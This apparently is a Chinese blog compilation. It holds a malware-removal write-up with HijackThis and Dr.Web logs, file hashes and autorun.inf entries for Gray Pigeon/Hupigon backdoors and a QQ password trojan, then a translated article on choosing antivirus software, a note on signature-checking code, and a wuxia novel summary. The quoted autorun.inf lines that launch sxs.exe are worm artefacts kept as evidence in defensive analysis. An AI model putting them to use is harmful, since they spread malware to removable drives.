C:\WINDOWS\SYSTEM32\WINNETWORKKEY.DLL 1980-4-2 7:1:26
C:\WINDOWS\system32\ctfmon.exe * 352 2004-8-17 12:0:0 Microsoft? Windows?Operating System 5.1.2600.2180 CTF Loader ? Microsoft Corporation. All rightsreserved. 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158) Microsoft Corporation ? CTFMON CTFMON.EXE
C:\WINDOWS\SYSTEM32\WINNETWORKKEY.DLL 1980-4-2 7:1:26
C:\SVCHOST.exe * 428 2006-11-15 21:59:30 C:\SVCHOST.exe 2006-11-15 21:59:30 C:\WINDOWS\system32\ntdll.dll 2004-8-17 12:0:0 Microsoft(R) Windows(R)Operating System 5.1.2600.2180 NT Layer DLL (C) Microsoft Corporation. All rightsreserved. 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158) Microsoft Corporation ? ntdll.dll ntdll.dll
C:\WINDOWS\SYSTEM32\WINNETWORKKEY.DLL 1980-4-2 7:1:26
C:\Program Files\Messenger\msmsgs.exe * 456 2004-10-14 0:24:38 Messenger Version 4.7.3001 Windows Messenger Copyright (c) Microsoft Corporation 2004 4.7.3001 Microsoft Corporation Microsoft(R) is a registered trademark of Microsoft Corporation inthe U.S. and/or other countries. msmsgs msmsgs.exe
C:\WINDOWS\SYSTEM32\WINNETWORKKEY.DLL 1980-4-2 7:1:26
C:\Program Files\Internet Explorer\IEXPLORE.EXE * 932 2004-8-17 20:0:0 Microsoft(R) Windows(R) Operating System 6.00.2900.2180 Internet Explorer (C)Microsoft Corporation. All rights reserved. 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158) Microsoft Corporation ? iexplore IEXPLORE.EXE
C:\WINDOWS\SYSTEM32\WINNETWORKKEY.DLL 1980-4-2 7:1:26
C:\WINDOWS\system32\Down(0).exe * 964 1980-4-2 7:1:30
C:\WINDOWS\system32\Down(0).exe 1980-4-2 7:1:30
C:\PROGRA~1\GAMECH~1\GameHall.exe * 3084 2007-1-19 13:7:42 GameHall 应用程序 18, 0, 2006, 1012 游戏大厅程序 同城游戏 (C) 2003-2004 18, 0, 2006, 1012 同城游戏 GameHall GameHall.EXE
C:\WINDOWS\SYSTEM32\WINNETWORKKEY.DLL 1980-4-2 7:1:26
C:\WINDOWS\system32\conime.exe * 1312 2004-8-17 12:0:0 Microsoft? Windows?Operating System 5.1.2600.2180 Console IME ? Microsoft Corporation. All rightsreserved. 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158) Microsoft Corporation ? Console CONIME.EXE
C:\WINDOWS\SYSTEM32\WINNETWORKKEY.DLL 1980-4-2 7:1:26
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\YHL2J69S\3[1].exe * 2692 2007-4-16 16:50:30
C:\WINDOWS\SYSTEM32\WINNETWORKKEY.DLL 1980-4-2 7:1:26

O4 - HKCR\..\Run: [bgswitch] C:\WINDOWS\system32\bgswitch.exe
O4 - HKCR\..\Run: [system] c:\SVCHOST.exe

O4 - HKLM\..\Run: [HTpatch] C:\WINDOWS\htpatch.exe

D:\autorun.inf
/-----
[AutoRun]
open=sxs.exe
shellexecute=sxs.exe
shell\Auto\command=sxs.exe
-----/
F:\autorun.inf
/-----
[AutoRun]
open=sxs.exe
shellexecute=sxs.exe
shell\Auto\command=sxs.exe
-----/

O9 - IE工具栏扩展按钮HKLM：JUJU猫 - {6096E38F-5AC1-4391-8EC4-75DFA92FB32F} - http://www.jujumao.com
O9 - IE工具菜单扩展项HKLM： - {6096E38F-5AC1-4391-8EC4-75DFA92FB32F} - http://www.jujumao.com

O23 - 服务: 110 (110) - C:\WINDOWS\system32\Down(0).exe 1980-4-2 7:1:30(自动)
O23 - 服务: cdnprot (cdnprot) - system32\drivers\cdnprot.sys(引导)
O23 - 服务: cdntran (cdntran) - system32\drivers\cdntran.sys(自动)
O23 - 服务: DHCPmanager (DHCPmanager) - C:\WINDOWS\system32\DHCPmanager.exe 1980-4-2 7:1:40(自动)
O23 - 服务: ferdr (FERDR) - C:\WINDOWS\system32\Drivers\Ferdr.sys 2002-5-31 10:26:22(自动)
O23 - 服务: GrayPigeonServer1.23 (Gray_Pigeon_Server1.23) - C:\WINDOWS\G_Server1.23.exe 2007-3-21 21:40:6(自动)
O23 - 服务: ok6250522.3322.org (ok6250522.3322.org) - C:\WINDOWS\system32\ok6250522.3322.org.exe 2007-4-16 13:32:18(自动)
O23 - 服务: windows backup for xp (window backup for xp) - c:\backup\backupms0213313751.exe 2007-3-21 20:49:42(自动)
O23 - 服务: Windows XP Vista (Windows XP Vista ) - C:\WINDOWS\Hac.exe(自动)
O23 - 服务: windows_0 (Windows Accounts Driver) - C:\WINDOWS\system32\Down(0).exe 1980-4-2 7:1:30(自动)

SHOWALL Type isn't dword
===/

再看HijackThis 的 log：
/---
Logfile of HijackThis v1.99.1
Scan saved at 22:01:17, on 2007-4-16
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:

C:\WINDOWS\system32\Down(0).exe

O4 - HKLM\..\Run: [HTpatch] C:\WINDOWS\htpatch.exe
O4 - HKCU\..\Run: [bgswitch] C:\WINDOWS\system32\bgswitch.exe
O4 - HKCU\..\Run: [system] c:\SVCHOST.exe

O23 - Service: 110 - Unknown owner - C:\WINDOWS\system32\Down(0).exe

O23 - Service: DHCPmanager - Unknown owner - C:\WINDOWS\system32\DHCPmanager.exe

O23 - Service: Gray_Pigeon_Server1.23 (GrayPigeonServer1.23) - Unknown owner - C:\WINDOWS\G_Server1.23.exe (file missing)

O23 - Service: ok6250522.3322.org - Unknown owner - C:\WINDOWS\system32\ok6250522.3322.org.exe

O23 - Service: window backup for xp (windows backup for xp) - Unknown owner - c:\backup\backupms0213313751.exe

O23 - Service: Windows XP Vista - Unknown owner - C:\WINDOWS\Hac.exe (file missing)

O23 - Service: Windows Accounts Driver (windows_0) - Unknown owner - C:\WINDOWS\system32\Down(0).exe

O23 - Service: WinNetwork - Unknown owner - C:\WINDOWS\system32\WinNetwork.exe
---/

用到 http://endurer.ys168.com 下载 IceSword检查进程，发现还有一个隐藏的IE进程。

终止病毒进程。

停止并禁用O23中的服务。

到 http://purpleendurer.ys168.com 下载 FileInfo 和 bat_do。用FileInfo提取文件信息，用 bat_do 将病毒文件打包。

下载 Dr.Web CureIt（下载地址和使用方法可参考：
免费的恶意程序检测和清除工具---Dr.Web CureIt! http://endurer.bokee.com/5488502.html），因为时间关系，只扫描 c:\windows 和 c:\Documents and Settings，结果……明天补上。

============================
Dr.Web(R) Scanner for Windows v4.33.2 (4.33.2.10067)

[Scan path] c:\windows\htpatch.exe
c:\windows\htpatch.exe is hacktool program Tool.Htpatch
----------------------------

[Scan path] C:\WINDOWS
C:\WINDOWS\htpatch.exe is hacktool program Tool.Htpatch
>C:\WINDOWS\system32\DHCPmanager.exe.vi infected with BackDoor.Pigeon.1220 - deleted
C:\WINDOWS\system32\DHCPmanager.DLL.vi infected with BackDoor.Pigeon.680 - deleted
C:\WINDOWS\system32\DHCPMANAGERKEY.DLL.vi infected with BackDoor.Pigeon.1294 - deleted
C:\WINDOWS\system32\RpcS.dll infected with BackDoor.Klj - deleted
C:\WINDOWS\system32\WinNetwork.exe.vi infected with BackDoor.Pigeon.1562 - deleted
>C:\WINDOWS\system32\WinNetwork.DLL.vi infected with BackDoor.Pigeon.1562 - deleted
>C:\WINDOWS\system32\WINNETWORKKEY.DLL.vi infected with BackDoor.Pigeon.1562 - deleted
>C:\WINDOWS\system32\ok6250522.3322.org.exe.vi probably infected with BINARYRES
C:\WINDOWS\system32\ok6250522.3322.org.dll.vi probably infected with DLOADER.Trojan

C:\WINDOWS\system32\drivers\i.sys is adware program Adware.Cdn
C:\WINDOWS\Temp\DHCPmanager0.DLL infected with BackDoor.Pigeon.680 - deleted
>C:\WINDOWS\Temp\WinNetwork0.DLL infected with BackDoor.Pigeon.1562 - deleted
>C:\WINDOWS\Temp\WinNetwork1.DLL infected with BackDoor.Pigeon.1562 - deleted

[Scan path] C:\Documents and Settings
>C:\Documents and Settings\Administrator\Local Settings\Temp\MPSampleSubmit\WinNetwork.exe.xor infected with BackDoor.Pigeon.1562 - deleted
>C:\Documents and Settings\Administrator\Local Settings\Temp\MPSampleSubmit\DHCPMANAGERKEY.DLL.xor infected with BackDoor.Pigeon.1294 - deleted
>C:\Documents and Settings\Administrator\Local Settings\Temp\MPSampleSubmit\DHCPmanager.DLL.xor infected with BackDoor.Pigeon.680 - deleted
>C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\68YH35WC\icast[1].js>C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\LVN1357C\formdatecheck[1].jsC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\ZVPBN9SW\network[1].exe infected with BackDoor.Pigeon.1562 - deleted

----------------------------
c:\windows\htpatch.exe - deleted
C:\WINDOWS\htpatch.exe - deleted
C:\WINDOWS\system32\ok6250522.3322.org.exe.vi - deleted
C:\WINDOWS\system32\ok6250522.3322.org.dll.vi.vi - will be deleted after reboot
C:\WINDOWS\system32\drivers\i.sys - deleted

============================
Total session statistics
============================
Objects scanned: 30891
Infected objects found: 14
Objects with modifications found: 0
Suspicious objects found: 2
Adware programs found: 1
Dialer programs found: 0
Joke programs found: 0
Riskware programs found: 0
Hacktool programs found: 2
Objects cured: 0
Objects deleted: 19
Objects renamed: 0
Objects moved: 0
Objects ignored: 0
Scan speed: 1800 Kb/s
Scan time: 00:28:41
============================

用HijackThis 修复可疑项。

Dr.Web CureIt未能发现和清除的，对bat_do生成取消文件所有属性和删除文件命令，下次启动时执行。

文件说明符 : C:\WINDOWS\system32\WINNETWORKKEY.DLL
属性 : -SHR
获取文件版本信息大小失败!
创建时间 : 2007-4-12 18:29:56
修改时间 : 1980-4-2 7:1:26
访问时间 : 2007-4-16 0:0:0
大小 : 27664 字节 27.16 KB
MD5 : 66e062502fb59d9157526f25614dfdfc

文件说明符 : D:\sxs.exe
属性 : -SH-
获取文件版本信息大小失败!
创建时间 : 2006-9-2 20:28:51
修改时间 : 2006-8-11 2:12:48
访问时间 : 2007-4-16 0:0:0
大小 : 33815 字节 33.23 KB
MD5 : 1781cb8004dc700ac66d799c35ac5c5a

卡巴报为 Trojan-PSW.Win32.QQPass.jn

文件说明符 : C:\net.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 1980-4-2 7:1:34
修改时间 : 1980-4-2 7:1:36
访问时间 : 2007-4-16 0:0:0
大小 : 315697 字节 308.305 KB
MD5 : 8b50d965ffacdb56e00e670ad105fa53

文件说明符 : C:\WINDOWS\Hac.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-4-5 13:33:5
修改时间 : 2007-4-5 13:33:6
访问时间 : 2007-4-16 0:0:0
大小 : 627712 字节 613.0 KB
MD5 : 9dd4cae0b290fc6c3183e0b867079ea3

文件说明符 : C:\WINDOWS\system32\Down(0).exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 1980-4-2 7:1:31
修改时间 : 1980-4-2 7:1:30
访问时间 : 2007-4-16 0:0:0
大小 : 17920 字节 17.512 KB
MD5 : 911c879eba7bc9a474ec8fa5c327d6b6

文件说明符 : C:\WINDOWS\system32\WinNetwork.DLL
属性 : ASHR
获取文件版本信息大小失败!
创建时间 : 1980-4-8 22:6:5
修改时间 : 1980-4-2 7:1:12
访问时间 : 2007-4-16 0:0:0
大小 : 257258 字节 251.234 KB
MD5 : 3ffee9665b61a4cb9155098b0fa63a01

卡巴报为 Backdoor.Win32.Hupigon.edb

文件说明符 : C:\WINDOWS\system32\WINNETWORKKEY.DLL
属性 : ASHR
获取文件版本信息大小失败!
创建时间 : 2007-4-12 18:29:56
修改时间 : 1980-4-2 7:1:26
访问时间 : 2007-4-16 0:0:0
大小 : 27664 字节 27.16 KB
MD5 : 66e062502fb59d9157526f25614dfdfc

卡巴报为 Backdoor.Win32.Hupigon.cge

文件说明符 : C:\WINDOWS\system32\DHCPmanager.exe
属性 : ASHR
获取文件版本信息大小失败!
创建时间 : 1980-4-3 23:39:46
修改时间 : 1980-4-2 7:1:40
访问时间 : 2007-4-16 0:0:0
大小 : 293058 字节 286.194 KB
MD5 : 0c8db59d9480bb0eb745fc97dd2bd729

文件说明符 : C:\WINDOWS\system32\WinNetwork.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 1980-4-8 22:6:2
修改时间 : 1980-4-2 7:1:42
访问时间 : 2007-4-16 0:0:0
大小 : 315697 字节 308.305 KB
MD5 : 8b50d965ffacdb56e00e670ad105fa53

卡巴报为 Backdoor.Win32.Hupigon.edb

文件说明符 : C:\backup\backupms0213313751.exe
属性 : -SHR
获取文件版本信息大小失败!
创建时间 : 2007-3-21 19:51:1
修改时间 : 2007-3-21 20:49:42
访问时间 : 2007-4-16 0:0:0
大小 : 624236 字节 609.620 KB
MD5 : e855d4668047e699077d5b3b5e6eb250

C:\>dir backup /a
驱动器 C 中的卷没有标签。
卷的序列号是 84E4-56E2

C:\backup 的目录

2007-03-21 19:51 <DIR> .
2007-03-21 19:51 <DIR> ..
2007-03-21 20:49 624,236 backupms0213313751.exe
2007-04-16 16:52 18,944 Down(0).exe
2007-04-16 13:06 18,944 Down(1).exe
2007-04-13 22:05 18,944 Down(2).exe
2007-04-13 22:08 18,944 Down(3).exe
2007-04-05 17:59 18,944 Down(4).exe
2007-04-05 17:59 18,944 Down(5).exe
2007-04-02 18:53 18,944 Down(6).exe
2007-04-02 18:53 18,944 Down(7).exe
2007-03-31 20:50 18,944 Down(8).exe
2007-03-31 20:13 18,944 Down(9).exe
2007-03-31 20:13 18,944 Down(10).exe
2007-03-31 20:13 18,944 Down(11).exe
2007-03-31 20:13 18,944 Down(12).exe
2007-03-31 20:13 18,944 Down(13).exe
2007-03-31 20:13 18,944 Down(14).exe
16 个文件 908,396 字节
2 个目录 3,691,520,000 可用字节

文件说明符 : C:\WINDOWS\system32\ok6250522.3322.org.dll
属性 : -SHR
语言 : 中文(中国)
文件版本 : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
说明 : Microsoft? Windows? Operating System
版权 : Microsoft Corporation. All rights reserved.
备注 :
产品版本 : 5.1.2600.2180
产品名称 : Microsoft? Windows? Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 : VipDll
源文件名 : msgsvc4.dll
创建时间 : 2007-4-15 14:21:31
修改时间 : 2007-4-15 14:21:32
访问时间 : 2007-4-16 0:0:0
大小 : 17408 字节 17.0 KB
MD5 : 74d1ab119831c91da4bc22d44761fcd4

文件说明符 : C:\WINDOWS\system32\ok6250522.3322.org.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-4-15 14:21:28
修改时间 : 2007-4-16 13:32:18
访问时间 : 2007-4-16 0:0:0
大小 : 43008 字节 42.0 KB
MD5 : 212b77e3914735ee18ef5fde966870b4

文件说明符 : C:\WINDOWS\htpatch.exe
属性 : A--R
获取文件版本信息大小失败!
创建时间 : 2007-11-15 10:55:18
修改时间 : 2002-12-20 0:40:24
访问时间 : 2007-4-16 0:0:0
大小 : 28672 字节 28.0 KB
MD5 : 47122e4e9b3da3e6ee66e1a56aae8f57

DrWeb 报为 Tool.Htpatch

G_Server1.23.exe 卡巴报为 Packed.Win32.PePatch.ev
DHCPmanager.exe、DHCPmanager.DLL、DHCPMANAGERKEY.DLL 卡巴报为 Backdoor.Win32.Hupigon.emr

寻找抗病毒应用程序要注意的10件事

10 things to look for in an antivirus application
寻找抗病毒应用程序要注意的10件事

by Erik Eckel Network+, MCP+I, MCSE 3/22/07
作者：Erik Eckel, 3/22/07
翻译：endurer
Tags: Security applications/tools Antivirus software
标签：安全应用程序/工具 抗病毒软件

英文来源：http://articles.techrepublic.com.com/5100-1009_11-6169682.html?tag=nl.e102

Takeaway: Selecting the right antivirus protection for your organization may be one of the most important decisions you'll be asked to make. Erik Eckel offers 10 key factors to keep in mind as you weigh the various AV options.
导读：选择恰当地抗病毒软件保护组织可能是最你所要作的重要的决定之一。Erik Eckel提供了你在权衡各种各样的抗病毒软件时要记住的10个关键因素。
《endurer注：1。keep in mind:记住》

Antivirus programs are no longer a best practice; they're a requirement. If a system has a power supply and runs Windows, it must have a first-rate antivirus application current with the latest signatures. Don't make it easier for attackers to compromise the systems you're supposed to be keeping secure. Insist on these 10 elements in any antivirus application you implement.
抗病毒程序不再是最优方法。他们是一种需要。如果一个系统有能力支持和运行Windows，它必须有目前第一流的、带最新特征库的抗病毒程序。不要让攻击者轻易危害，你应该保持安全。对你使用的一些抗病毒程序强调10点。
《endurer注：1。best practice:最优方法》

#1: Potency
效力

An antivirus program is useless if it fails to identify and isolate viruses, worms, and similar infections. Productivity losses quickly mount when you have to clean machines of malicious software. Removing infections from systems supposedly protected by antivirus applications only adds insult to injury. Avoid such frustration by ensuring that the antivirus platform you deploy effectively prevents infection.
抗病毒程序如果不能鉴别和隔离病毒、蠕虫、和类似危害，是没用的。当你清理被恶意软件感染的机器时，生产损失迅速增大。从抗病毒程序保护的系统中清除危害更是雪上加霜。通过确认你部署的抗病毒平台有效地防止危害来避免这类挫折。
《endurer注：1。production loss:生产损失
2。add insult to injury:伤害之外又加侮辱(使关系更糟),雪上加霜》

Don't let persuasive ads or persistent channel partners talk you into specific brands. Research your options thoroughly and talk to other IT pros to learn their recommendations. The insight you'll gain is invaluable, especially when comparing notes with colleagues within the same industry—those who are responsible for maintaining the same type of business and enterprise applications.
不要让有诱惑力的广告或固执的渠道合作伙伴说服你用指定牌子。重新彻底研究你的选项，并与其它IT专家交谈，研究他们的推荐。你将获得的真知卓见是无价的，特别是当和同事就同一产品交换意见时——这些同事正维护同类公司和企业软件。
《endurer注：1。talk into:说服
2。compare notes:交换意见》

#2: Low overhead
低开销

Some mass-market antivirus programs have been known to bring minimally configured Windows systems to a standstill. An effective antivirus program must constantly work behind the scenes to monitor active applications. That's understood. But protective software apps requiring (or commanding) significant system resources often do more harm than good.
一些销量大的抗病毒程序已知会给最低配置的Windows系统带来停顿。一个有效的抗病毒程序必须在后台实时工作，以监控活动程序。这是容易理解的。但保护软件程序要求（或占用）相当数量的系统资源通常弊多利少。
《endurer注：1。do more harm than good:弊多利少》

When selecting an antivirus application, review the program's system requirements. Before committing to a solution, test the application on several workstations to determine the true load that the program places on real-world equipment. Don't settle for manufacturers' claims. Verify performance data firsthand.
在选择抗病毒程序时，研究该程序的系统要求。在确认解决方案前，在几台工作站上测试该程序来判断把这些程序置于真实设备上的真实性。不要向制造厂家付清所有款项。校验第一手性能数据。
《endurer注：1。settle a claim:付帐；解决索赔；清算债务》

#3: Centralized administration
集中管理

No one enjoys having to visit every workstation within the organization. That's just what you'll have to do, though, if you standardize on an antivirus application that doesn't support centralized distribution and administration.
没有人喜欢访查组织内的每一台工作站。如果你使用不支持集中分配和管理的抗病毒程序，这将是你不得不做的。

Make sure the antivirus solution you select works well with Windows Intellimirror and other mass client-deployment technologies (or has its own native deployment features). Although some smaller organizations aren't as dependent on time-saving deployment tools, remotely managing and administering antivirus applications is still most efficient, even in businesses with just 20 employees. By eliminating the need to visit those systems to configure scans, review logs, and maintain updates, strong centralized administration features more than pay for themselves.
确信你选择的抗病毒解决方案可以和Windows智能镜像及其它部署客户端技术合谐工作（或有其原生部署特性）。尽管一些较小的机构不依赖于省时部署工具，但远程管理和执行抗病毒程序仍是最有效率的，即使是在只有20名雇员的企业中。通过消除访查这些系统以进行配置扫描、检查日志、维护更新的需要，强大的集中管理特性。
《endurer注：1。IntelliMirror(智能镜像）管理技术是嵌于Windows 2000操作系统的一系列强大特性，可增加系统的可用性，减少用户总支持费用。详细介绍：http://www.microsoft.com/china/windows2000/library/howitworks/management/intellimirror.asp
2。be dependent on:取决于》

#4: E-mail protection
电子邮件保护

It goes without saying that any antivirus solution should guard against infectious code sent or received in e-mail. However, not all applications provide such protection. Even if your organization maintains an e-mail server- or router-based antivirus program, seek client antivirus apps that provide secondary e-mail protection.
不消说，任何抗病毒解决方案都需要防范传染性的代码通过电子邮件发送或接收。然而，不是所有的应用程序都提供这个保护。即使机构维护一台电子邮件服务器或基于路由的抗病毒程序，还是寻求提供二级电子邮件保护的客户端抗病毒应用程序罢。
《endurer注：1。It goes without saying:不言而喻
2。guard against:防止,防范》

Client-side e-mail security offers essential protection for your organization. It also safeguard's its reputation, preventing users from infecting external customers, partners, and suppliers and keeping your organization off one of many troublesome spam lists.
客户端电子邮件安全为机构提供必要的保护。它也保卫机构的声誉,防范用户传染到外部客户，合作者和支持者，并使机构避免一些列入令人烦恼的垃圾邮件列表中的邮件。
《endurer注：1。keep off:不接近,避开》

#5: Compatibility
兼容性

In addition to confirming that an antivirus application operates well with your operating system, check that it doesn't create errors when installed alongside enterprise applications, proprietary programs, and other software packages. Some IT newsgroups—and occasionally, antivirus manufacturers—do a good job of warning about known conflicts. But the best bet is to install the solution (prior to a department- or organization-wide deployment) to test the antivirus software's interaction with other programs.
此外还要确定抗病毒程序可以与操作系统良好运行，检测其与企业程序、专有程序、及其它软件包一起运行时不产生错误。一些IT新闻组——及抗病毒程序制造商不时也会——做好警告已知冲突的工作。但最好的措施是使用解决方案（在部门或机构范围部署前）来测试抗病毒软件的与其它程序的相互作用。
《endurer注：1。do a good job:vi. 工作干得好
2。best bet:最好的措施
3。prior to:在...之前
4。interact with:与...相互作用》

Pay particularly close attention if you're working with Microsoft Vista. Don't expect Windows XP-based antivirus software to work well with the newest desktop OS. In fact, in most cases, it won't. If your organization has moved to Vista, confirm that the security software is certified for use with the newest Windows platform.
如果你正使用微软Vista，要特别注意。不要期望基于Windows XP的抗病毒程序在新的桌面操作系统上良好工作。实际上，在大多情况下，这是不可能的。若机构已转移到Vista，要确认安全软件经验证可用于最新的Windows平台。
《endurer注：1。to pay close attention to:密切注意》

#6: Effective reporting tools
有效的的报告工具

Some antivirus solutions enable you to review reports from all configured clients via a Web interface. Others produce reports indicating threats, scans, and infections but require that an administrator visit each client to obtain that information.
一些抗病毒方案使你能通过网页界面审查所有已配置客户端的报告。其它产品报告威胁指示、扫描和感染，但要求管理员访问每台客户机来获取这些信息。
Review your organization's needs and determine which method will work best. Consider reporting features carefully. A program's logs and report information will prove invaluable in alerting you to problems before or as they occur.
审查机构的需要并判断哪种方法效果最佳。仔细考虑报告特性。一个程序的日志和报告信息在问题发生之前或发生时向您发出警告将会有很高的价值。

#7: Technical support
技术支持

Antivirus programs fail. It's inevitable. Sooner or later, you'll encounter strange failures, bizarre error messages, or inexplicable system freezes. Having access to the antivirus manufacturer's development staff is essential for successfully identifying a solution.
抗病毒程序失误，这是不可避免的。你迟早会遇到奇怪的失败，奇异的错误信息，或费解的系统停滞。可以联系抗病毒软件生产商的开发人员对成功鉴定解决方案是重要的。
《endurer注：1。have access to:可以到达(可以使用)》

Before purchasing any software, check out the manufacturer's Web site. Find out whether the manufacturer provides a toll-free number for support, review any troubleshooting forums, and check which live assistance options exist.
在购买软件前，检查厂商的网站。找出厂商是否提供技术支持免费电话，查阅故障排查论坛，检查其日常助理选项的存在。

#8: Certification
认证

Just as an antivirus solution's potency is critical, so too is certification. Manufacturers can make all the promises and claims they want in marketing materials, but industry certification is hard won. ICSA Labs, Virus Bulletin, West Coast Labs, the National Associate of Specialist Computer Retailers, and others all require antivirus programs to meet stringent requirements to receive certification.
正如抗病毒解决方案的能力是关键，认证也是如此。制造商能做出所有承诺并声称他们想参加，但产业认证难于获取。ICSA Labs（国际电脑安全协会），Virus Bulletin(病毒公报)，West Coast Labs(英国西海岸实验室)，the National Associate of Specialist Computer Retailers，和其它所有要求抗病毒程序满足来严格要求来接受认证。
《endurer注：1。want in:想要进来(想参加)》

Of course, certification isn't foolproof. But one way to know you're purchasing a trustworthy application is to confirm that the program has earned certification from these leading labs.
所以，认证不是很简单的。但知道你正在购买可信赖的应用程序的一种方法是确认该程序已获得这些领导实验室的认证。

#9: Simplified licensing
精简许可证

Once you've identified an antivirus solution that's potent, compatible, and backed by quality technical support (among other elements), it's time to turn your attention to licensing. Some manufacturers complicate licensing to the point that you can install a dedicated license on only a single machine. If that system's hard disk or motherboard fails (or the entire system goes down), under OEM terms your organization is likely required to purchase another license, even if the original term is yet to expire.
一旦你认定了有效、兼容、有质量技术支持（除了其它元素外）的抗病毒解决方案，就是把注意力转到协议上的时候了。一些制造商把申请许可证的一个要害搞得复杂：一个专用许可证只能安装在一台机器上。如果系统的硬盘或主板坏了（或事个系统完蛋了），在OEM条款下，机构极有可能被要求购买其它许可证，即使原始条款仍然有效。
《endurer注：1。to the point:切题,切中要害》

Review license requirements with care. It's often best to purchase client licenses by seat. Thus, if a workstation or server fails, migrating an existing license to the replacement system becomes a simple matter. (But expect to pay more for the privilege.)
仔细审查许可证要求。通常按位购买客户许可证是最好的。这样，如果一个工作站或服务器坏了，迁移
现存许可证到替代系统将会成为一件简单的事情。（但）

Remember to factor in growth considerations when purchasing a specific number of seats. It's all too easy to exceed licensing limits signed six months ago. Keep detailed notes on how many systems receive antivirus software and keep the documentation current as workstations and servers are replaced or upgraded.
在购买一定数量的位置时要记得考虑增长因素。超出6个月前签署的许可协议限制实在是太容易了。详细记录安装抗病毒软件的系统数量，并在工作站和服务器替换或升级时更新文件。

#10: Reasonable cost
合理成本

When purchasing fewer than 50 licenses, expect to pay approximately $30 to $45 per seat for an annual antivirus license. As an organization exceeds 100 licenses, costs can drop to as low as $25 per user.
购买少于50个许可时，预计每个位置的年抗病毒软件许可大约30到45美元。当一个组织机构超过100个许可时，成本可降低至每个用户25美元。

Unless an application includes firewall, anti-spyware, or antispam features, prices should fall within the above ranges. Any organization tempted to add firewall or anti-spyware tools to its antivirus application, especially for 20 or more users, might be better served pursuing a hardware-based solution (such as the ones provided by SonicWALL, Barracuda, and other manufacturers) instead of a software-focused product.
除非一个软件包括防火墙，抗间谍软件，或抗垃圾处理邮件特性，价格应该在上列范围内。一些组织机构打算增加防火墙或抗间谍软件工具到抗病毒软件，特别是有20或更多用户的，购买基于硬件的解决方案（例如SonicWALL， Barracuda或其它厂商之一提供的）代替焦点软件产品可能有更好地服务。

《endurer注：1。fall within:属于
2。SonicWALL是全球中小型企业市场中公认的领导厂商，其解决方案广泛应用于分布式企业环境、ZF、零售业销售点、医疗保健领域以及服务供应商行业。 总部位于美国加利福尼亚州桑尼维尔市。
3。Barracuda Networks2002年底成立，是全球的垃圾邮件产品市场价格性能比的领导者，其拳头产品“梭子鱼”垃圾邮件防火墙系列产品屡获殊荣。总部位于美国硅谷Cupertino。
4。instead of: 代替,而不是》

研究了一下验证数字签名的代码

在Google上搜索关于卸载DLL的资料时，看到了一篇关于验证数字签名的东东，这在对付一些伪装成微软Windows系统文件的恶意程序文件相当有用。

这篇文档中的代码是用VS.net写的
其中用了一些非API函数，这些非API函数在msdn上都找不到~

还好，用Google的代码搜索找到了Delphi写的代码

改用MASM32实现~

有空把它集成到pe_xscan中

大侠狄龙子 9回 概要 endurer评注 文麟认姐被劫成饵 三姑救弟木令现身

第 九 回 薄命怅红颜　绮玉偎香成苦忆 当筵飞木令　高怀雅量感雄奸

　　三姑认文麟为弟，安排到暖房浴室沐浴。
　　文麟浴后在温榻上卧倒，由三姑想到淑华，忽发痴念，臆想淑就在对面，诉苦埋怨。
　　昏沉睡去，醒来发现身子被a绑在白银拐冯越（冯八公）所养恶兽黄腥子身后，带到冯村。
　　冯八公长子冯胜、女盗乾坤一枝花项凤夫妇说三姑忘恩负义，将冯八公派去的人打成重伤，口出不逊，未来赔罪。才将文麟带回，引三姑来。见文麟与三姑无染，甚是敬佩。
　　谈话得知冯越受三姑之父临终托孤，令三姑拜为义父。因见三姑与已死爱妾貌相身材竟如一人，渐生邪心，将三姑配他门下一个死党之子。婚后把三姑常时接到冯家，又命党羽暗中离间，令一美貌女贼勾引三姑之夫成奸，再与三姑去抓现场，表面痛骂三姑之夫，暗中送财命其速走，与女贼同往山东，成了夫妇，再人带信令三姑改嫁。
　　三姑渐渐看出冯越邪念，暗中和冯越翻脸，却未向人揭发。
　　三姑迷恋文麟，看出冯越表面相助，暗中作梗，形于词色。
　　冯婉如回家拨弄是非。冯越恼羞成怒，命长子冯胜和乾坤一枝花项凤英把文麟擒来，引三姑上门要人，再背人向她盘问。
　　冯越在门外偷听，见文麟一任三姑威逼勾引，并未顺从，心生敬佩，与文麟入席谈话，说起这次与人结怨经过。所约异人追击珊儿至寒萼谷，为司徒良珠所阻，定约而返。
　　忽听恶兽黄腥子怒吼，冯胜、项风英夫妇出去查看。
　　冯越说自己因逼婚之事被三姑痛恨，难免造谣诽谤，文麟与之苟合，休想活命。
　　文麟说自己不久出家，断无受人勾引之事。
　　冯越有事外出。
　　凶僧恶道和冯婉如现身。凶僧（大头和尚？）扬手就抓，被文麟闪过。
　　窗外有人冷笑，发出铁木令，击穿桌心。
　　三姑飞入，说从此双方情断义绝，有事只管寻自己。欲与文麟离开，凶僧恶道同时发难，窗外人打出内家罡气练成的劈空掌，击碎凶僧肩骨……

endurer评注

冯越奸雄也难过美人关~
三姑红颜薄命

［人］三姑：大约比文麟痴长半岁……属狗……从小娇惯，饮食起居多半任性，她们照例分班伺候，日夜均有专人。我又天性喜洁，不论冬夏，每日都要沐浴。后面有窑，柴炭方便，暖房中火昼夜不熄。……貌相身材和冯八公热爱二三十年的爱妾竟如一人……性情刚烈，人更机智

［人］文麟：……属狗……生性喜洁，本来沐浴无间冬夏……少年英俊，品学兼优

